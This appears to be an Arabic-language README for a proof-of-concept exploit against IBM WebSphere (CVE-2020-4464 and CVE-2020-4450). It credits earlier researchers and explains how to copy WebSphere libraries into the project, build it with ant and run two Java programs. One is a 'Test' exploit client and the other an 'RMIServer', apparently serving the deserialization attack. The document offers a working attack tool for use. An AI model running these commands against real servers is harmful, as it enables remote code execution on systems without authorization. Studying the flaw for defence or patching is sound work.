
CVE-2020-4464 / CVE-2020-4450
هذا مبني على منشورات المدونة الممتازة لـ ZDI (تقرير أصلي من @_tint0):
... وعمل بعض القراصنة الصينيين الماهرين (لم أتمكن من تحديد المصدر الحقيقي للكود، لا تتردد في فتح Issue إذا كنت تعتقد أنك تستحق الفضل):
إضافاتي (ليست كثيرة حقًا):
كود FoxGlove تم إحضاره كوحدة فرعية، يمكنك استخدام ملف طلب WebSphere لتشغيل CVE-2020-4464.
يجب عليك نسخ المجلدات plugins و runtimes من WebSphere إلى المجلد lib، ثم تشغيل ant للتجميع!
للتشغيل (Java 11):
java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer